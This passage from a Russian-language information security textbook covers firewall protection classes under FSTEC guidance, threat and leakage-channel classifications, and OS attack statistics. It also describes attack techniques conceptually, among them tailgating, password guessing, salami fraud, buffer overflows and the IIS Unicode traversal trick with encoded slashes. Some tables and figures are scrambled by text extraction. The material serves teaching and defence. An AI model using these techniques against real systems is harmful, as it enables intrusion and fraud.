41 Рассмотренные выше документы ФСТЭК России необходимо вос- принимать как первую стадию формирования отечественных стандартов в области информационной безопасности. На разработку этих докумен- тов наибольшее влияние оказал критерий TCSEC ("Оранжевая книга") однако это влияние в основном отражается в ориентированности этих документов на защищенные системы силовых структур и в использова- нии единой универсальной шкалы оценки степени защищенности. Поскольку, в современных АС широко используются сетевые тех- нологии рассмотрим показатели защищенности межсетевых экранов.
1.6.2. Показатели защищенности межсетевых экранов
В руководящем документе Гостехкомиссии России: “Руководящий
документ. Средства вычислительной техники. Межсетевые экраны. За- щита от несанкционированного доступа к информации. Показатели за- щищенности от несанкционированного доступа к информации” устанав- ливается классификация межсетевых экранов (МЭ) по уровня защищен- ности от несанкционированного доступа (НСД) к информации на базе перечня показателей защищенности и совокупности описывающих их требований. Под сетями ЭВМ, распределенными автоматизированными система- ми в данном документе понимаются соединенные каналами связи систе- мы обработки данных, ориентированные на конкретного пользователя. МЭ представляет собой локальное (однокомпонентное) или функ- ционально - распределенное средство (комплекс), реализующее кон- троль за информацией, поступающей в АС и/или выходящей из АС, и обеспечивает защиту АС посредством фильтрации информации, т.е. ее анализа по совокупности критериев и принятия решения о ее распро- странении в (из) АС. Руководящий документ разработан в дополнение к Руководящим документам Гостехкомиссии России “Средства вычислительной техни- ки. Защита от несанкционированного доступа к информации. Показате- ли защищенности от несанкционированного доступа к информации” и “Автоматизированные системы. Защита от несанкционированного до- ступа к информации. Классификация автоматизированных систем и тре- бования по защите информации”. Документ предназначен для заказчиков и разработчиков МЭ, а так- же сетей ЭВМ, распределенных автоматизированных систем с целью использования при формулировании и реализации требований по их за- щите от НСД к информации.
42 Данные показатели содержат требования к средствам защиты, обеспе- чивающим безопасное взаимодействие сетей ЭВМ, АС посредством управ- ления межсетевыми потоками информации и реализованных в виде МЭ. Показатели защищенности применяются к МЭ для определения уровня защищенности, который они обеспечивают при межсетевом вза- имодействии. Конкретные перечни показателей определяют классы за- щищенности МЭ. Деление МЭ на соответствующие классы по уровням контроля межсетевых информационных потоков с точки зрения защиты информа- ции необходимо в целях разработки и применения обоснованных и эко- номически оправданных мер по достижению требуемого уровня защиты информации при взаимодействии ЭВМ, АС. Дифференциация подхода к выбору функций защиты в МЭ определяется АС, для защиты которой применяется данный экран. Устанавливается пять классов защищенности МЭ. Каждый класс характеризуется определенной минимальной сово- купностью требований по защите информации. Самый низкий класс защищенности - пятый, применяемый для без- опасного взаимодействия АС класса 1Д с внешней средой, четвертый - для 1Г, третий - 1В, второй - 1Б, самый высокий - первый, применяемый для безопасного взаимодействия АС класса 1А с внешней средой Требования, предъявляемые к МЭ, не исключают требований, предъявляемых к средствам вычислительной техники (СВТ) и АС в со- ответствии с руководящими документами Гостехкомиссии России “Средства вычислительной техники. Защита от несанкционированного доступа к информации. Показатели защищенности от несанкциониро- ванного доступа к информации” и “Автоматизированные системы. За- щита от несанкционированного доступа к информации. Классификация автоматизированных систем и требования по защите информации” При включении МЭ в АС определенного класса защищенности, класс защищенности совокупной АС, полученной из исходной путем добавления в нее МЭ, не должен понижаться. Для АС класса 3Б, 2Б должны применяться МЭ не ниже 5 класса. Для АС класса 3А, 2А в зависимости от важности обрабатываемой информации должны применяться МЭ следующих классов: при обработке информации с грифом “секретно” - не ниже 3 класса; при обработке информации с грифом “совершенно секретно” - не ниже 2 класса;
43 при обработке информации с грифом “особой важности” - не ниже 1 класса. Таким образом, фактически, обмен информацией, составляющей государственную тайну, между автоматизированными системами клас- сов 1Д - 1А или при наличии такой системы только на одном конце, данным документом не предусмотрен. К недостаткам руководящих документов ФСТЭК России следует отнести: ориентация на противодействие НСД и отсутствие требований к адекватности реализации политики безопасности. Отсутствие требова- ний к защите от угроз работоспособности. Понятие "политика безопас- ности" трактуется исключительно как поддержание режима секретности и отсутствие НСД [28]. Из-за этого средства защиты ориентируются только на противодействие внешним угрозам, а к структуре самой си- стемы и ее функционированию не предъявляется четких требований. Ранжирование требований по классам защищенности по сравнению с остальными стандартами информационной безопасности максимально упрощено и сведено до определения наличия или отсутствия заданного набора механизмов защиты, что существенно снижает гибкость требо- ваний и возможность их практического применения. Несмотря на указанные недостатки, документы ФСТЭК России за- полнили "правовой вакуум" в области стандартов информационной без- опасности в России и оперативно решили проблему проектирования и оценки качества защищенных АС.
1.7. Классификация угроз безопасности информации
Нарушение безопасности информации возможно как вследствие различных возмущающих воздействий, в результате которых происхо- дит уничтожение (модификация) данных или создаются каналы утечки данных, так и вследствие использования нарушителем каналов утечки данных[22]. Воздействия, в результате которых может быть нарушена безопас- ность данных, включают в себя: случайные воздействия природной среды (ураган, землетрясение, по- жар, наводнение и т.п. – отключение питания, помехи в линии связи); целенаправленные воздействия нарушителя (шпионаж, разрушение компонентов АC, использование прямых каналов утечки данных); внутренние возмущающие факторы (отказы аппаратуры, ошибки в математическом и программном обеспечении, недостаточная профес- сиональная и морально-психологическая подготовка персонала и т.д.).
44 Упрощенная классификация угроз безопасности информации и ка- налов утечки информации представлена на рис. 6.
Рис. 6. Классификация угроз безопасности информации
Под каналом утечки понимается потенциальная возможность НСД, которая обусловлена архитектурой, технологической схемой функцио- нирования АС, а также существующей организацией работы с данными. Уязвимые места АС, которые потенциально предоставляют нару- шителю возможность НСД, приведены на рис.7. Все каналы утечки данных можно разделить на косвенные и прямые. Косвенными называются такие каналы утечки, использование которых для НСД не требует непосредственного доступа к техническим устрой- ствам АС. Косвенные каналы утечки возникают, например, вследствие недостаточной изоляции помещений, просчетов в организации работы с данными и предоставляют нарушителю возможность применения под- слушивающих устройств, дистанционного фотографирования, перехвата электромагнитных излучений, хищения носителей данных и производ- ственных отходов (листингов машинных программ и др.).
45 Неисправности Сбои программных Ошибки Излучения аппаратуры; сбои средств защиты; коммутации; ошибки программ; излучения средств и механизмов защиты сбои аппаратуры; излучения Терминал
Аппаратура связи и Носители ЭВМ коммутации данных Линии связи Терминал Ошибки операторов; Незаконное Хищение; подключение; Маскировка под раскрытие механизмов несанкционированн раскрытие другого защиты; отключение пользователя; ое копирование и механизмов защиты; содержания данных; считывание несанкционированный анализ, изменение, ошибки в работе; носителей данных прерывание потока раскрытие доступ к данным данных; инициация механизмов защиты; ложного соединения незаконное использование данных; копирование данных
Рис. 7. Уязвимые места АС
Прямые каналы утечки данных требуют непосредственного доступа к техническим средствам АС и данным. Наличие прямых каналов утечки обусловлено недостатками технических и программных средств защиты, ОС, СУБД, математического и программного обеспечения, а также про- счетами в организации технологического процесса работы с данными. Прямые каналы утечки данных позволяют нарушителю подключиться к аппаратуре АС, получить доступ к данным и выполнить действия по анализу, модификации и уничтожению данных. При использовании прямых каналов утечки нарушитель может по- лучить несанкционированный доступ к секретной информации и выпол- нить ряд других деструктивных действий. Несанкционированный доступ к секретной информации реализует- ся с использованием следующих основных приемов: “За дураком” - проникновение как в производственные помещения (физическое), так и в электронные системы по следующей схеме: физическое проникновение - держа в руках предметы связанные с работой на компьютерной технике (элементы маскировки), нужно ожидать кого-либо, имеющего санкционированный доступ, возле запертой двери, за которой находится предмет посягательства. Ко- гда появляется законный пользователь, остается только войта
46 внутрь вместе с ним или попросить его помочь занести якобы не- обходимые для работы на компьютере предметы; электронное проникновение - подключение компьютерного тер- минала к каналам связи с использованием шлейфа “шнурка” в тот момент времени, когда сотрудник кратковременно покидает свое рабочее место, оставляя терминал или персональный компьютер в активном режиме. “За хвост” - преступник подключается к линии связи законного пользователя и дожидается сигнала, обозначающего конец работы, пе- рехватывает его на себя, а потом, когда законный пользователь заканчи- вает активный режим, осуществляет доступ к системе. Подобными свой- ствами обладают телефонные аппараты с функцией удержания номера вызываемого абонентом. “Компьютерный абордаж” - подбор вручную или с использовани- ем автоматической программы кода доступа автоматизированной систе- мы с использованием обычного телефонного аппарата. “Неспешный выбор” (брешь, люк) - изучение слабых мест в защи- те автоматизированной системы, их исследований, выявление участков имеющих ошибки или неудачную логику программного строения, раз- рыв программы и дополнительное введение команд. “Маскарад” - проникновение в компьютерную систему, выдавая себя за законного пользователя с использованием его кодов и других идентифицирующих шифров. Мистификация - создание условий, когда пользователь подключа- ется к чьей-либо системе, будучи абсолютно уверенным в том, что он работает с нужным ему абонентом. Формируя правдоподобные ответы на запросы пользователя и поддерживая его заблуждения некоторое время, обычно добывается коды доступа или отклик на пароль. “Аварийный” - создание условий для возникновения сбоев или других отклонений в работе ЭВМ, когда в компьютерном центре вклю- чается особая программа, позволяются в аварийном режиме получать доступ к наиболее ценным данным, как правило, в этом режиме “отклю- чаются” все имеющиеся в системе средства защиты информации. На основной фазе - основными приемами манипуляции данными и управляющими программами, приводящими к движению информацион- ных ресурсов являются: "Подмена данных" - изменение или введение новых данных, как правило, при вводе-выводе информации для приписывания адрес- ным данным “чужой” истории.
47 “Троянский конь (матрешка, червь, бомба)” - тайное введение в программное обеспечение специальных программ, как правило, отчисляющих. Все манипуляции с данными производится и кон- тролируется этой программой в определенный заданный момент времени и при стечении благоприятных для преступника обстоя- тельств. “Асинхронная атака” - используя асинхронную природу операци- онной системы, преступник может заставить работать при ложных условиях из-за чего управление обработкой частично или полно- стью нарушается. Эта ситуация используется для внесения изме- нений в операционную систему, причем в не ее эти изменения не будут заметны. “Моделирование” - построение модели поведения АС в различных условиях с целью оптимизации способа манипуляции данными и организации движения информационных ресурсов. “Салями” - оригинальная электронная версия методов изъятия “лишних” денежных средств в свою пользу. При использовании этого ме- тода злоумышленник так же, как и в предыдущем случае, “дописывает” прикладное программное обеспечение специальным модулем, который манипулирует с информацией, перебрасывая на подставной счет резуль- таты округления при проведении законных транзакций. Расчет построен на том, что отчисляемые суммы столь малы, что их потери практически незаметны, а незаконное накопление средств проводится за счет суммы совершения большого количества операций (ст. 272, 273,158 УК РФ).
1.8. Основные методы нарушения конфиденциальности,
целостности и доступности информации При рассмотрении вопросов защиты АС целесообразно использо- вать четырехуровневую градацию доступа к хранимой, обрабатываемой и защищаемой АС информации, которая поможет систематизировать как возможные угрозы, так и меры по их нейтрализации и парированию, т.е. поможет систематизировать и обобщить весь спектр методов обеспече- ния защиты, относящихся к информационной безопасности. Эти уровни следующие: уровень носителей информации; уровень средств взаимодействия с носителем; уровень представления информации; уровень содержания информации.
48 Данные уровни были введены исходя из того, что, во-первых, ин- формация для удобства манипулирования чаще всего фиксируется на некотором материальном носителе, которым может быть бумага, диске- та или что-нибудь в этом роде. Во-вторых, если способ представления ин формации таков, что она не может быть непосредственно воспринята человеком. Возникает необходимость в преобразователях информации в доступный для человека способ представления. Например, для чтения информации с дискеты необходим компьютер, оборудованный дисково- дом соответствующего типа. В-третьих, как уже было отмечено, ин- формация может быть охарактеризована способом своего представления или тем, что еще называется языком в обиходном смысле. Язык жестов, язык символов и т.п. - все это способы представления информации. В- четвертых, человеку должен быть доступен смысл представленной ин- формации, ее семантика. Защита носителей информации должна обеспечивать парирование всех возможных угроз, направленных как на сами носители, так и на за- фиксированную на них информацию, представленную в виде изменения состояний отдельных участков, блоков, полей носителя. Применительно к АС защита носителей информации в первую очередь подразумевает защиту машинных носителей. Вместе с тем, необходимо учитывать, что носителями информации являются также каналы связи, документальные материалы, получаемые в ходе эксплуатации АС, и т.п. Защита средств взаимодействия с носителем охватывает спектр методов защиты про- граммно-аппаратных средств, входящих в состав АС, таких как средства вычислительной техники, операционная система, прикладные програм- мы. В основном защита на данном уровне рассматривается как защита от не санкционированного доступа, обеспечивающая разграничение до- ступа пользователей к ресурсам системы. Защита представления инфор- мации, т.е. некоторой последовательности символов, обеспечивается средствами криптографической защиты. Защита содержания информа- ции обеспечивается семантической защитой данных. К основным направлениям реализации злоумышленником информа- ционных угроз относятся: непосредственное обращение к объектам доступа; создание программных и технических средств, выполняющих об- ращение к объектам доступа в обход средств защиты; модификация средств защиты, позволяющая реализовать угрозы ин формационной безопасности; внедрение в технические средства АС программных или техниче-
49 ских механизмов, нарушающих предполагаемую структуру и функции АС. К числу основных методов реализации угроз информационной без- опасности АС относятся: определение злоумышленником типа и параметров носителей ин- формации; получение злоумышленником информации о программно- аппаратной среде, типе и параметрах средств вычислительной техники, типе и версии операционной системы, составе приклад- ного программного обеспечения; получение злоумышленником детальной информации о функциях, выполняемых АС; получение злоумышленником данных о применяемых системах за- щиты; определение способа представления информации; определение злоумышленником содержания данных, обрабатыва- емых в АС, на качественном уровне (применяется для мониторин- га АС и для дешифрования сообщений); хищение (копирование) машинных носителей информации, со- держащих конфиденциальные данные; использование специальных технических средств для перехвата побочных электромагнитных излучений и наводок (ПЭМИН) - конфиденциальные данные перехватываются злоумышленником путем выделения информативных сигналов из электромагнитного излучения и наводок по цепям питания средств вычислительной техники, входящей в АС; уничтожение средств вычислительной техники и носителей ин- формации; хищение (копирование) носителей информации; несанкционированный доступ пользователя к ресурсам АС в обход или путем преодоления систем защиты с использованием специ- альных средств, приемов, методов; несанкционированное превышение пользователем своих полномочий; несанкционированное копирование программного обеспечения; перехват данных, передаваемых по каналам связи; визуальное наблюдение - конфиденциальные данные считываются с экранов терминалов, распечаток в процессе их печати и т. п.; раскрытие представления информации (дешифрование данных); раскрытие содержания информации на семантическом уровне - до-
50 ступ к смысловой составляющей информации, хранящейся в АС; уничтожение машинных носителей информации; внесение пользователем несанкционированных изменений в про- граммно-аппаратные компоненты АС и обрабатываемые данные; установка и использование нештатного аппаратного и/или про- граммного обеспечения; заражение программными вирусами; внесение искажений в представление данных, уничтожение дан- ных на уровне представления, искажение информации при переда- че по линиям связи, внедрение дезинформации; выведение из строя машинных носителей информации без уни- чтожения информации - выведение из строя электронных блоков накопите лей на жестких дисках и т. п.; проявление ошибок проектирования и разработки аппаратных и программных компонентов АС; обход (отключение) механизмов защиты - загрузка злоумышленни- ком нештатной операционной системы с дискеты, использование отладочных режимов программно-аппаратных компонент АС и т.п.; искажение соответствия синтаксических и семантических конструк- ций языка - установление новых значений слов, выражений и т. п.; запрет на использование информации - имеющаяся информация по каким-либо причинам не может быть использована. Распределение перечисленных методов реализации угроз информа- ционной безопасности представлено в табл. 3. Таким образом, поскольку перечисленные в табл. 3 виды угроз не зависят от уровней доступа к информации, можно говорить, что их соче- тание образует двумерную дискретную конечную систему координат. Для удобства такая система может быть выражена в виде двумер- ной таблицы, являющейся методологическим инструментом. В зависи- мости от целей, которые ставятся специалистом по информационной безопасности, данная таблица может описывать как основные меры по защите АС, так и основные методы реализации угроз.
1.9. Атаки на автоматизированные системы
В общем случае программное обеспечение любой АС состоит из трех основных компонентов: операционной системы, сетевого про- граммного обеспечения (СПО) и системы управления базами данных (СУБД). Поэтому все попытки взлома защиты АС можно разделить на три группы:
51 атаки на уровне систем управления базами данных; атаки на уровне операционной системы; атаки на уровне сетевого программного обеспечения.
1.9.1. Атаки на уровне систем управления базами данных
Защита СУБД является одной из самых простых задач. Это связано
с тем, что СУБД имеют строго определенную внутреннюю структуру, и операции над элементами СУБД заданы довольно четко. Есть четыре основных действия - поиск, вставка, удаление и замена элемента. Другие операции являются вспомогательными и применяются достаточно ред- ко. Наличие строгой структуры и четко определенных операций упро- щает решение задачи защиты СУБД. В большинстве случаев хакеры предпочитают взламывать защиту автоматизированной системы на уровне операционной системы и получать доступ к файлам СУБД с по- мощью средств операционной системы.
Таблица 3
Основные методы реализации угроз информационной безопасности
Уровень до- ступа к ин- Угроза отказа формации в Угроза раскры- Угроза наруше- Угроза наруше- служб (отказа АС тия параметров ния конфиденци- ния целостности доступа к ин- системы альности формации) Определение Хищение (копи- Уничтожение Выведение из типа и парамет- рование) носите- машинных но- строя машин- Носителей ин- ров носителей лей информации. сителей инфор- ных носителей формации информации Перехват мации информации ПЭМИН Получение ин- Несанкциониро- Внесение поль- Проявление формации о ванный доступ к зователем не- ошибок проек- программно- ресурсам АС. санкциониро- тирования и аппаратной Совершение ванных измене- разработки про- Средств взаи- среде. Получе- пользователем ний в програм- граммно- модействия с ние детальной несанкциониро- мы и данные. аппаратных носителем информации о ванных дей- Установка и ис- компонент АС. функциях, вы- ствий. Несанк- пользование Обход меха- полняемых АС. ционированное нештатного про- низмов защиты Получение дан- копирование граммного обес- АС ных о применя- программного печения. Зара-
52 емых системах обеспечения. жение про- защиты Перехват дан- граммными ви- ных, передавае- русами мых по каналам связи
Определение Визуальное Внесение иска- Искажение со-
способа пред- наблюдение. жения в пред- ответствия син- Представления ставления инРаскрытие пред- ставление дан- таксических и информации формации ставления ин- ных; уничтоже- семантических формации (де- ние данных конструкций шифрование) языка Определение со Раскрытие со- Внедрение дез- Запрет на ис- держания дан- держания ин- информации пользование Содержания ных на каче- формации информации информации ственном уровне
Однако в случае, если используется СУБД, не имеющая достаточно
надежных защитных механизмов, или плохо протестированная версия СУБД, содержащая ошибки, или если при определении политики без- опасности администратором СУБД были допущены ошибки, то стано- вится вполне вероятным преодоление хакером защиты, реализуемой на уровне СУБД. Кроме того, имеются два специфических сценария атаки на СУБД, для защиты от которых требуется применять специальные ме- тоды. В первом случае результаты арифметических операций над число- выми полями СУБД округляются в меньшую сторону, а разница сумми- руется в некоторой другой записи СУБД (как правило, эта запись содер- жит личный счет хакера в банке, а округляемые числовые поля относят- ся к счетам других клиентов банка). Во втором случае хакер получает доступ к полям записей СУБД, для которых доступной является только статистическая информация. Идея хакерской атаки на СУБД - так хитро сформулировать запрос, чтобы множество записей, для которого соби- рается статистика, состояло только из одной записи.
53 1.9.2. Атаки на уровне операционной системы
Защищать операционную систему, в отличие от СУБД, гораздо
сложнее. Дело в том, что внутренняя структура современных операци- онных систем чрезвычайно сложна, и поэтому соблюдение адекватной политики безопасности является значительно более трудной задачей. Часто бытует мнение, что самые эффективные атаки на операционные системы могут быть организованы только с помощью сложнейших средств, основанных на самых последних достижениях науки и техники, а злоумышленник должен быть программистом высочайшей квалифика- ции. Это не совсем так. Никто не спорит с тем, что пользователю следует быть в курсе всех новинок в области компьютерной техники. Да и высокая квалификация - совсем не лишнее. Однако искусство хакера состоит отнюдь не в том, чтобы взламывать любую самую "крутую" компьютерную защиту. Нуж- но просто суметь найти слабое место в конкретной системе защиты. При этом простейшие методы взлома оказываются ничуть не хуже самых изощренных, поскольку, чем проще алгоритм атаки, тем больше вероят- ность ее завершения без ошибок и сбоев, особенно если возможности предварительного тестирования этого алгоритма в условиях, прибли- женных к "боевым", весьма ограничены. Успех реализации того или иного алгоритма хакерской атаки на практике в значительной степени зависит от архитектуры и конфигура- ции конкретной операционной системы, являющейся объектом этой ата- ки. Однако имеются атаки, которым может быть подвергнута практиче- ски любая операционная система: 1. Кража пароля; подглядывание за пользователем, когда тот вводит пароль, дающий право на работу с операционной системой (даже если во время ввода пароль не высвечивается на экране дисплея, хакер может легко узнать пароль, просто следя за перемещением пальцев пользователя по клавиатуре); получение пароля из файла, в котором этот пароль был со- хранен пользователем, не желающим затруднять себя вво- дом пароля при подключении к сети (как правило, такой пароль хранится в файле в незашифрованном виде); поиск пароля, который пользователи, чтобы не забыть, за- писывают на календарях, в записных книжках или на обо- ротной стороне компьютерных клавиатур (особенно часто
54 подобная ситуация встречается, если администраторы за- ставляют пользователей применять трудно запоминаемые пароли); кража внешнего носителя парольной информации (диске- ты или электронного ключа, на которых хранится пароль пользователя, предназначенный для входа в операционную систему); полный перебор всех возможных вариантов пароля; подбор пароля по частоте встречаемости символов и би- грамм, с помощью словарей наиболее часто применяемых паролей, с привлечением знаний о конкретном пользовате- ле - его имени, фамилии, номера телефона, даты рождения и т. д., с использованием сведений о существовании экви- валентных паролей, при этом из каждого класса опробует- ся всего один пароль, что может значительно сократить время перебора; 2. Сканирование жестких дисков компьютера (хакер последова- тельно пытается обратиться к каждому файлу, хранимому на жестких дисках автоматизированной системы; если объем дискового пространства достаточно велик, можно быть вполне уверенным, что при описании доступа к файлам и ка- талогам администратор допустил хотя бы одну ошибку, в ре- зультате чего все такие каталоги и файлы будут прочитаны хакером; для сокрытия следов хакер может организовать эту атаку под чужим, именем: например, под именем пользовате- ля, пароль которого известен хакеру); 3. Сборка "мусора" (если средства операционной системы позво- ляют восстанавливать ранее удаленные объекты, хакер может воспользоваться этой возможностью, чтобы получить доступ к объектам, удаленным другими пользователями: например, просмотрев содержимое их "мусорных" корзин); 4. Превышение полномочий (используя ошибки в программном обеспечении или в администрировании операционной систе- мы, хакер получает полномочия, превышающие полномочия, предоставленные ему согласно действующей политике без- опасности): - запуск программы от имени пользователя, имеющего не- обходимые полномочия, или в качестве системной про- граммы (драйвера, сервиса, демона и т. д.);
55 - подмена динамически загружаемой библиотеки, использу- емой системными программами, или изменение перемен- ных среды, описывающих путь к таким библиотекам; - модификация кода или данных подсистемы защиты самой операционной системы; - отказ в обслуживании (целью этой атаки является частич- ный или полный вывод из строя операционной системы): - захват ресурсов (хакерская программа производит захват всех имеющихся в операционной системе ресурсов, а затем входит в бесконечный цикл); - бомбардировка запросами (хакерская программа постоян- но направляет операционной системе запросы, реакция на которые требует привлечения значительных ресурсов ком- пьютера); - использование ошибок в программном обеспечении или администрировании. Если в программном обеспечении автоматизированной системы нет ошибок и ее администратор строго соблюдает политику безопасности, рекомендованную разработчиками операционной системы, то атаки всех перечисленных типов малоэффективны. Дополнительные меры, которые должны быть предприняты для повышения уровня безопасности, в зна- чительной степени зависят от конкретной операционной системы, под управлением которой работает данная компьютерная система. Тем не менее, приходится признать, что вне зависимости от предпринятых мер полностью устранить угрозу взлома автоматизированной системы на уровне операционной системы невозможно. Поэтому политика обеспе- чения безопасности должна проводиться так, чтобы, даже преодолев за- щиту, создаваемую средствами операционной системы, хакер не смог нанести серьезного ущерба. Рассмотрим особенности угроз современным операционным систе- мам. Семейства современных ОС и общая статистика угроз На сегодняшний день существует достаточно большая статистика угроз ОС [28], направленных на преодоление встроенных в ОС меха- низмов защиты, позволяющих изменить настройки механизмов безопас- ности, обойти разграничения доступа и т.д. Таким образом, статистика фактов несанкционированного доступа к информации показывает, что большинство распространенных систем
56 (универсального назначения) довольно уязвимы с точки зрения безопас- ности. И это несмотря на отчетливую тенденцию к повышению уровня защищенности этих систем. Здесь же необходимо отметить, что на практике современные ин- формационные системы, предназначенные для обработки конфиденци- альной информации, строятся уже с учетом дополнительных мер без- опасности. А это также косвенно подтверждает изначальную уязвимость современных ОС. Проиллюстрируем сказанное. Для этого рассмотрим операционные системы, фигурирующие в публикуемых списках системных и приклад- ных ошибок, то есть ошибок, позволяющих получить несанкциониро- ванный доступ к системе, понизить степень ее защищенности или до- биться отказа в обслуживании (системного сбоя). Итак, вот эти операци- онные системы:
BSDI AIX MS Windows 9X MS Windows NT Solaris SCO MS Windows 2000 Sun OS IOS (Cisco) Novell NetWare Digital Unix Linux BSD HPUX IRIX
Общее количество известных успешных атак для различных ОС
[28], представлено в табл. 4, а их процентное соотношение для различ- ных типов ОС — на диаграмме рис. 8.
Таблица 4 Общее количество известных успешных атак для различных ОС Тип ОС Количество атак Тип ОС Количество атак MS Windows 130 Linux 167 NT/2000 MS Windows 9X/ME 120 IRIX 84 BSD 64 HPUX 65 BSDI 10 AIX 42 Solaris 125 SCO 40 Sun OS 40 Novell NetWare 10 Digital Unix 25 IOS (Cisco) 7
57 Novell NetWare 1% SCO IOS (Cisco) 4% 1% AIX MS Windows 5% NT/2000 HPUX 14% 7%
MS Windows 9X/ME IRIX 13% 9%
BSD 7% Linux 18% BSDI 1% Digital Unix Solaris 3% 13%
Рис. 8. Статистика соотношения угроз для различных ОС
Вследствие того, что большинство атак для операционных систем,
построенных на базе UNIX (BSD или AT&T), достаточно похожи, целе- сообразно объединить их в одну группу. Тоже самое можно сказать и об ОС семейства Windows. Таким образом, в дальнейшем будем рассмат- ривать только семейства ОС: 1. UNIX. 2. MS Windows. 3. Novell NetWare. Общее количество известных успешных атак для различных групп ОС представлено в табл. 5, а их процентное соотношение для различных типов ОС — на диаграмме рис.9.
Таблица 5 Общее количество известных успешных атак для различных групп ОС Тип ОС Количество атак MS Windows 230 UNIX 660 Novell NetWare 10
58 MS Novell Window NetWare s 1% 26%
UNIX 73%
Рис. 9. Статистика соотношения угроз для семейств ОС
Относительно ОС Novell следует заметить, что данная ОС изна- чально создавалась как защищенная (не универсального назначения) ОС, основной функцией которой был защищенный файловый сервис. Это, с одной стороны, должно было обеспечить ее более высокий уровень за- щищенности, с другой стороны, налагало определенные ограничения по использованию. Однако, начиная с пятой версии, данная ОС начала при- обретать свойства универсальности (с точки зрения применяемых про- токолов и приложений), что в какой-то мере может сказаться и на уровне ее защищенности. Классификация методов, лежащих в основе атак на современные ОС, и их сравнительная статистика Анализируя рассматриваемые атаки, все методы, позволяющие не- санкционированно вмешаться в работу системы, можно разделить на следующие группы: Позволяющие несанкционированно запустить исполняемый код. Позволяющие осуществить несанкционированные операции чте- ния/записи файловых или других объектов. Позволяющие обойти установленные разграничения прав доступа. Приводящие к отказу (Denial of Service) в обслуживании (систем- ный сбой). Использующие встроенные недокументированные возможно- сти(ошибки и закладки). Использующие недостатки системы хранения или выбора (недо- статочная длина) данных об аутентификации (пароли) и позволя-
59 ющие путем реверсирования, подбора или полного перебора всех вариантов получить эти данные. Троянские программы. Прочие. Диаграмма, представляющая собой соотношение групп атак (для представленной выше их классификации) для ОС семейства Windows, представлена на рис. 10, для ОС семейства UNIX — на рис. 11. Кратко проиллюстрируем выделенные группы угроз.
35%
30%
25%
20%
15%
10%
5% 0% Первая Вторая Третья Четвертая Пятая Шестая Седьмая Восьмая группа группа группа группа группа группа группа группа (исполня- (чтения/ (″троянские (РПД) (DOS) (закладки) (пароли) (прочие) емый код) записи) программы″)
6% 32% 4% 27% 5% 9% 12% 5%
Рис. 10. Соотношение групп атак для ОС семейства Windows
45%
40%
35%
30%
25%
20%
15%
10%
5% 0% Первая Вторая Третья Четвертая Пятая Шестая Седьмая Восьмая группа группа группа группа группа группа группа группа (исполня- (чтения/ (″троянские (РПД) (DOS) (закладки) (пароли) (прочие) емый код) записи) программы″)
39% 2% 4% 24% 3% 7% 8% 13%
60 Рис. 11. Соотношение групп атак для ОС семейства UNIX
код К данной группе относятся угрозы, которые основываются на пере- полнении буфера для входных данных (переполнение стека) и последу- ющей передачи управления на исполняемый код, занесенный при этом в стек. Для переполнения стека используется тот факт, что часто при вы- полнении функций работы со строками, переменными среды исполнения и т.д., разработчики ПО не заботятся о проверке размерности входных данных. А это приводит к выходу за границы массивов, выделенных для работы с этими данными. В последнее время появилось целое направле- ние системных средств по борьбе с угрозами данной группы (Pax, StackGuard). Одним из методов предотвращения подобных ошибок является присвоение атрибута, исключающего исполнение кода страницам памя- ти, выделенным под стек. Тем не менее, существуют возможности обхо- да данного ограничения. Большая часть примеров, реализующих эту группу угроз, рассчитаны на ОС семейства UNIX. При этом переполнение буфера возможно в самых разнообразных приложениях и системных утилитах. Наиболее часто оно используется для удаленного запуска исполняемого кода, посредством об- работчиков сетевых запросов и протоколов (ftp, telnet, рорЗ и др.). Переполнение буфера можно использовать и в локальном контек- сте, для того, чтобы увеличить свои привилегии или получить доступ на уровне администратора системы (root). Примерами реализации этой группы угроз являются следующие программы: ♦ Zgvexploit.c ♦ Kmemthief.c ♦ Imapdexploit.c и др. Для ОС семейства UNIX эта группа включает в себя наибольшее количество опубликованных примеров для несанкционированного до- ступа к системе (более 30%). Для ОС семейства MS Windows применение угроз данной группы также возможно, но в основном это приводит только к сбоям прикладно- го или системного уровня, которые отнесены к другой группе. Заметим, что общее число примеров, использующих переполнения буфера для це- лей отличных от вывода системы из строя, не превышает 10%.
61 Угрозы, позволяющие осуществить несанкционированные операции чтения/записи Ко второй группе можно отнести угрозы, основывающиеся на не- правильной интерпретации прикладными и системными программами входных параметров. В результате они дают доступ к объектам, не пере- численным в списках санкционированного доступа. Неправильная интерпретация входных параметров связана с некор- ректной программной реализацией их обработки. Это происходит пото- му, что программы, обрабатывающие данные запросы, являются либо системными утилитами, либо прикладными программами, запущенными в контексте безопасности системы. Поэтому они имеют непосредствен- ный доступ к любым файловым (и другим) объектам, и могут предоста- вить этот доступ пользователями, не обладающими достаточными пра- вами для непосредственной работы с этими объектами. Наибольшее распространение получили реализации данных методов для ОС семейства MS Windows. В основном ошибки встречаются в стан- дартных включенных в состав операционных систем Internet/Intranet- приложениях, которые включены в состав ОС, таких как IIS (Internet Information Server), почтовые клиенты (MS Mail, Exchange) и др. Достаточно большое количество ошибок данного рода можно встретить в системных утилитах, реализующих взаимодействие по сете- вым протоколам прикладного уровня (NETBIOS и др.). Например, ошибка в IIS заключается в следующем. IIS, обрабаты- вая запросы в формате UNICODE, может неправильно интерпретировать символы ‘\’, ‘/’ и т.п. (%c0%af, %cl%9c и т.п.), что приводит в дальней- шем к генерации некорректных команд (недоступных в нормальной си- туации) и получению несанкционированного доступа к объектам. Большое количество ошибок встречается в реализации Java- аплетов, VB-скриптов и т.д. в браузерах фирм Microsoft и Netscape. Че- рез них с помощью соответствующих аплетов можно получить несанк- ционированный доступ к файловым объекта. А поскольку обе фирмы выпускают свои браузеры не только для ОС семейства MS Windows, но и для ОС семейства UNIX, то ошибки в большинстве случаев дублиру- ются в версиях ПО для разных платформ. Здесь же стоит отметить, что проблема аплетов относится собственно не к языку Java, а к его реализа- ции, например, Microsoft Java VM.
